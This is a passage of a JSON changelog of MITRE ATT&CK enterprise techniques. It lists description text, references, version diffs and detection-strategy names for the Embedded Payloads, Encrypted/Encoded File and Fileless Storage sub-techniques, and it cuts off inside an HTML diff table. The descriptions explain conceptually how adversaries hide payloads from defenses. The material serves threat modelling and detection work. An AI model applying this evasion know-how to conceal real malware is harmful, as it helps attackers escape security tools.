                            "description": "Brennan, M. (2022, February 16). Hackers No Hashing: Randomizing API Hashes to Evade Cobalt Strike Shellcode Detection. Retrieved August 22, 2022.",
                            "url": "https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection"
                        },
                        {
                            "source_name": "BlackHat API Packers",
                            "description": "Choi, S. (2015, August 6). Obfuscated API Functions in Modern Packers. Retrieved August 22, 2022.",
                            "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Choi-API-Deobfuscator-Resolving-Obfuscated-API-Functions-In-Modern-Packers.pdf"
                        },
                        {
                            "source_name": "Drakonia HInvoke",
                            "description": "drakonia. (2022, August 10). HInvoke and avoiding PInvoke. Retrieved August 22, 2022.",
                            "url": "https://dr4k0nia.github.io/posts/HInvoke-and-avoiding-PInvoke/"
                        },
                        {
                            "source_name": "IRED API Hashing",
                            "description": "spotheplanet. (n.d.). Windows API Hashing in Malware. Retrieved August 22, 2022.",
                            "url": "https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:17:50.411000+00:00\", \"old_value\": \"2025-04-15 22:24:25.266000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['external_references'][3]['url']\": {\"new_value\": \"https://dr4k0nia.github.io/posts/HInvoke-and-avoiding-PInvoke/\", \"old_value\": \"https://dr4k0nia.github.io/dotnet/coding/2022/08/10/HInvoke-and-avoiding-PInvoke.html?s=03\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0091: Detection Strategy for Dynamic API Resolution via Hash-Based Function Lookups"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2022-09-30 18:50:14.351000+00:00",
                    "modified": "2026-04-15 22:18:17.938000+00:00",
                    "name": "Embedded Payloads",
                    "description": "Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs) \n\nAdversaries may embed payloads in various file formats to hide payloads.(Citation: Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.(Citation: GitHub PSImage) \n\nFor example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.(Citation: SentinelLabs reversing run-only applescripts 2021) \n\nEmbedded content may also be used as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign system processes.(Citation: Trend Micro) These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.(Citation: Malware Analysis Report ComRAT)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027/009",
                            "external_id": "T1027.009"
                        },
                        {
                            "source_name": "GitHub PSImage",
                            "description": "Barrett Adams . (n.d.). Invoke-PSImage . Retrieved September 30, 2022.",
                            "url": "https://github.com/peewpw/Invoke-PSImage"
                        },
                        {
                            "source_name": "Malware Analysis Report ComRAT",
                            "description": "CISA. (2020, October 29). Malware Analysis Report (AR20-303A) MAR-10310246-2.v1 \u2013 PowerShell Script: ComRAT. Retrieved September 30, 2022.",
                            "url": "https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a"
                        },
                        {
                            "source_name": "Trend Micro",
                            "description": "Karen Victor. (2020, May 18). Reflective Loading Runs Netwalker Fileless Ransomware. Retrieved September 30, 2022.",
                            "url": "https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflective-loading.html"
                        },
                        {
                            "source_name": "Securelist Dtrack2",
                            "description": "KONSTANTIN ZYKOV. (2019, September 23). Hello! My name is Dtrack. Retrieved September 30, 2022.",
                            "url": "https://securelist.com/my-name-is-dtrack/93338/"
                        },
                        {
                            "source_name": "Microsoft Learn",
                            "description": "Microsoft. (2021, April 6). 2.5 ExtraData. Retrieved September 30, 2022.",
                            "url": "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/c41e062d-f764-4f13-bd4f-ea812ab9a4d1"
                        },
                        {
                            "source_name": "SentinelLabs reversing run-only applescripts 2021",
                            "description": "Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022.",
                            "url": "https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/"
                        },
                        {
                            "source_name": "Sentinel Labs",
                            "description": "Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 30, 2022.",
                            "url": "https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Nick Cairns, @grotezinfosec"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:18:17.938000+00:00\", \"old_value\": \"2025-04-15 19:58:03.051000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1040: Behavior Prevention on Endpoint",
                            "M1049: Antivirus/Antimalware"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0214: Detection Strategy for Embedded Payloads"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-03-29 12:38:17.135000+00:00",
                    "modified": "2026-04-15 22:18:22.179000+00:00",
                    "name": "Encrypted/Encoded File",
                    "description": "Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.\n\nThis type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding schemes such as Base64.\n\nThe entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.\n\nFor example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) \n\nAdversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027/013",
                            "external_id": "T1027.013"
                        },
                        {
                            "source_name": "File obfuscation",
                            "description": "Aspen Lindblom, Joseph Goodwin, and Chris Sheldon. (2021, July 19). Shlayer Malvertising Campaigns Still Using Flash Update Disguise. Retrieved March 29, 2024.",
                            "url": "https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/"
                        },
                        {
                            "source_name": "SFX - Encrypted/Encoded File",
                            "description": "Jai Minton. (2023, March 31). How Falcon OverWatch Investigates Malicious Self-Extracting Archives, Decoy Files and Their Hidden Payloads. Retrieved March 29, 2024.",
                            "url": "https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Andrew Northern, @ex_raritas",
                        "David Galazin @themalwareman1",
                        "Jai Minton, @Cyberraiju"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:18:22.179000+00:00\", \"old_value\": \"2025-04-15 19:58:05.840000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1040: Behavior Prevention on Endpoint",
                            "M1049: Antivirus/Antimalware"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0087: Encrypted or Encoded File Payload Detection Strategy"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-03-23 19:55:25.546000+00:00",
                    "modified": "2026-04-15 22:18:39.119000+00:00",
                    "name": "Fileless Storage",
                    "description": "Adversaries may store data in \"fileless\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage in Windows systems include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) Shared memory directories on Linux systems (`/dev/shm`, `/run/shm`, `/var/run`, and `/var/lock`) and volatile directories on Network Devices (`/tmp` and `/volatile`) may also be considered fileless storage, as files written to these directories are mapped directly to RAM and not stored on the disk.(Citation: Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell 2024)(Citation: Aquasec Muhstik Malware 2024)(Citation: Bitsight 7777 Botnet)(Citation: CISCO Nexus 900 Config).\n\nSimilar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by antivirus and other endpoint security tools that can only access specific file formats from disk storage. Leveraging fileless storage may also allow adversaries to bypass the protections offered by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored. \n\nSome forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\\System32\\Wbem\\Repository`) or Registry (e.g., `%SystemRoot%\\System32\\Config`) physical files.(Citation: Microsoft Fileless) ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1027/011",
                            "external_id": "T1027.011"
                        },
                        {
                            "source_name": "Aquasec Muhstik Malware 2024",
                            "description": " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message Queuing Services Applications. Retrieved September 24, 2024.",
                            "url": "https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/"
                        },
                        {
                            "source_name": "Bitsight 7777 Botnet",
                            "description": "Batista, Jo\u00e3o.  Gi7w0rm. (2024, August 27). Retrieved June 5, 2025.",
                            "url": "https://www.bitsight.com/blog/7777-botnet-insights-multi-target-botnet"
                        },
                        {
                            "source_name": "CISCO Nexus 900 Config",
                            "description": "CISCO. (2021, September 14). Cisco Nexus 9000 Series NX-OS Fundamentals Configuration Guide, Release 7.x. Retrieved June 5, 2025.",
                            "url": "https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus9000/sw/7-x/fundamentals/configuration/guide/b_Cisco_Nexus_9000_Series_NX-OS_Fundamentals_Configuration_Guide_7x/b_Cisco_Nexus_9000_Series_NX-OS_Fundamentals_Configuration_Guide_7x_chapter_01000.html"
                        },
                        {
                            "source_name": "Elastic Binary Executed from Shared Memory Directory",
                            "description": "Elastic. (n.d.). Binary Executed from Shared Memory Directory. Retrieved September 24, 2024.",
                            "url": "https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html"
                        },
                        {
                            "source_name": "SecureList Fileless",
                            "description": "Legezo, D. (2022, May 4). A new secret stash for \u201cfileless\u201d malware. Retrieved March 23, 2023.",
                            "url": "https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/"
                        },
                        {
                            "source_name": "Microsoft Fileless",
                            "description": "Microsoft. (2023, February 6). Fileless threats. Retrieved March 23, 2023.",
                            "url": "https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats"
                        },
                        {
                            "source_name": "Sysdig Fileless Malware 23022",
                            "description": "Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved September 24, 2024.",
                            "url": "https://sysdig.com/blog/containers-read-only-fileless-malware/"
                        },
                        {
                            "source_name": "Akami Frog4Shell 2024",
                            "description": "Ori David. (2024, February 1). Frog4Shell \u2014 FritzFrog Botnet Adds One-Days to Its Arsenal. Retrieved September 24, 2024.",
                            "url": "https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Christopher Peacock",
                        "Denise Tan",
                        "Mark Wee",
                        "Simona David",
                        "Vito Alfano, Group-IB",
                        "Xavier Rousseau"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:18:39.119000+00:00\", \"old_value\": \"2025-06-05 15:30:20.139000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may store data in \\\"fileless\\\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage in Windows systems include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) Shared memory directories on Linux systems (`/dev/shm`, `/run/shm`, `/var/run`, and `/var/lock`) and volatile directories on Network Devices (`/tmp` and `/volatile`) may also be considered fileless storage, as files written to these directories are mapped directly to RAM and not stored on the disk.(Citation: Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell 2024)(Citation: Aquasec Muhstik Malware 2024)(Citation: Bitsight 7777 Botnet)(Citation: CISCO Nexus 900 Config).\\n\\nSimilar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by antivirus and other endpoint security tools that can only access specific file formats from disk storage. Leveraging fileless storage may also allow adversaries to bypass the protections offered by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\\n\\nAdversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored. \\n\\nSome forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\\\\System32\\\\Wbem\\\\Repository`) or Registry (e.g., `%SystemRoot%\\\\System32\\\\Config`) physical files.(Citation: Microsoft Fileless) \", \"old_value\": \"Adversaries may store data in \\\"fileless\\\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage in Windows systems include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) Shared memory directories on Linux systems (`/dev/shm`, `/run/shm`, `/var/run`, and `/var/lock`) and volatile directories on Network Devices (`/tmp` and `/volatile`) may also be considered fileless storage, as files written to these directories are mapped directly to RAM and not stored on the disk.(Citation: Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell 2024)(Citation: Aquasec Muhstik Malware 2024)(Citation: Bitsight 7777 Botnet)(Citation: CISCO Nexus 900 Config).\\n\\nSimilar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage. Leveraging fileless storage may also allow adversaries to bypass the protections offered by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\\n\\nAdversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored. \\n\\nSome forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\\\\System32\\\\Wbem\\\\Repository`) or Registry (e.g., `%SystemRoot%\\\\System32\\\\Config`) physical files.(Citation: Microsoft Fileless) \", \"diff\": \"--- \\n+++ \\n@@ -1,6 +1,6 @@\\n Adversaries may store data in \\\"fileless\\\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage in Windows systems include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) Shared memory directories on Linux systems (`/dev/shm`, `/run/shm`, `/var/run`, and `/var/lock`) and volatile directories on Network Devices (`/tmp` and `/volatile`) may also be considered fileless storage, as files written to these directories are mapped directly to RAM and not stored on the disk.(Citation: Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell 2024)(Citation: Aquasec Muhstik Malware 2024)(Citation: Bitsight 7777 Botnet)(Citation: CISCO Nexus 900 Config).\\n \\n-Similar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage. Leveraging fileless storage may also allow adversaries to bypass the protections offered by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\\n+Similar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by antivirus and other endpoint security tools that can only access specific file formats from disk storage. Leveraging fileless storage may also allow adversaries to bypass the protections offered by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\\n \\n Adversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored. \\n \"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to4__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to4__0\"><a href=\"#difflib_chg_to4__top\">t</a></td><td class=\"diff_header\" id=\"from4_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;store&nbsp;data&nbsp;in&nbsp;\"fileless\"&nbsp;formats&nbsp;to&nbsp;conceal&nbsp;</td><td class=\"diff_next\"><a href=\"#difflib_chg_to4__top\">t</a></td><td class=\"diff_header\" id=\"to4_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;store&nbsp;data&nbsp;in&nbsp;\"fileless\"&nbsp;formats&nbsp;to&nbsp;conceal&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">malicious&nbsp;activity&nbsp;from&nbsp;defenses.&nbsp;Fileless&nbsp;storage&nbsp;can&nbsp;be&nbsp;br</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">malicious&nbsp;activity&nbsp;from&nbsp;defenses.&nbsp;Fileless&nbsp;storage&nbsp;can&nbsp;be&nbsp;br</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">oadly&nbsp;defined&nbsp;as&nbsp;any&nbsp;format&nbsp;other&nbsp;than&nbsp;a&nbsp;file.&nbsp;Common&nbsp;exampl</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">oadly&nbsp;defined&nbsp;as&nbsp;any&nbsp;format&nbsp;other&nbsp;than&nbsp;a&nbsp;file.&nbsp;Common&nbsp;exampl</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es&nbsp;of&nbsp;non-volatile&nbsp;fileless&nbsp;storage&nbsp;in&nbsp;Windows&nbsp;systems&nbsp;inclu</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es&nbsp;of&nbsp;non-volatile&nbsp;fileless&nbsp;storage&nbsp;in&nbsp;Windows&nbsp;systems&nbsp;inclu</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">de&nbsp;the&nbsp;Windows&nbsp;Registry,&nbsp;event&nbsp;logs,&nbsp;or&nbsp;WMI&nbsp;repository.(Cita</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">de&nbsp;the&nbsp;Windows&nbsp;Registry,&nbsp;event&nbsp;logs,&nbsp;or&nbsp;WMI&nbsp;repository.(Cita</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion:&nbsp;Microsoft&nbsp;Fileless)(Citation:&nbsp;SecureList&nbsp;Fileless)&nbsp;Sha</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion:&nbsp;Microsoft&nbsp;Fileless)(Citation:&nbsp;SecureList&nbsp;Fileless)&nbsp;Sha</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">red&nbsp;memory&nbsp;directories&nbsp;on&nbsp;Linux&nbsp;systems&nbsp;(`/dev/shm`,&nbsp;`/run/s</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">red&nbsp;memory&nbsp;directories&nbsp;on&nbsp;Linux&nbsp;systems&nbsp;(`/dev/shm`,&nbsp;`/run/s</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hm`,&nbsp;`/var/run`,&nbsp;and&nbsp;`/var/lock`)&nbsp;and&nbsp;volatile&nbsp;directories&nbsp;o</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hm`,&nbsp;`/var/run`,&nbsp;and&nbsp;`/var/lock`)&nbsp;and&nbsp;volatile&nbsp;directories&nbsp;o</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;Network&nbsp;Devices&nbsp;(`/tmp`&nbsp;and&nbsp;`/volatile`)&nbsp;may&nbsp;also&nbsp;be&nbsp;consi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;Network&nbsp;Devices&nbsp;(`/tmp`&nbsp;and&nbsp;`/volatile`)&nbsp;may&nbsp;also&nbsp;be&nbsp;consi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">dered&nbsp;fileless&nbsp;storage,&nbsp;as&nbsp;files&nbsp;written&nbsp;to&nbsp;these&nbsp;directorie</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">dered&nbsp;fileless&nbsp;storage,&nbsp;as&nbsp;files&nbsp;written&nbsp;to&nbsp;these&nbsp;directorie</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;are&nbsp;mapped&nbsp;directly&nbsp;to&nbsp;RAM&nbsp;and&nbsp;not&nbsp;stored&nbsp;on&nbsp;the&nbsp;disk.(Cit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td 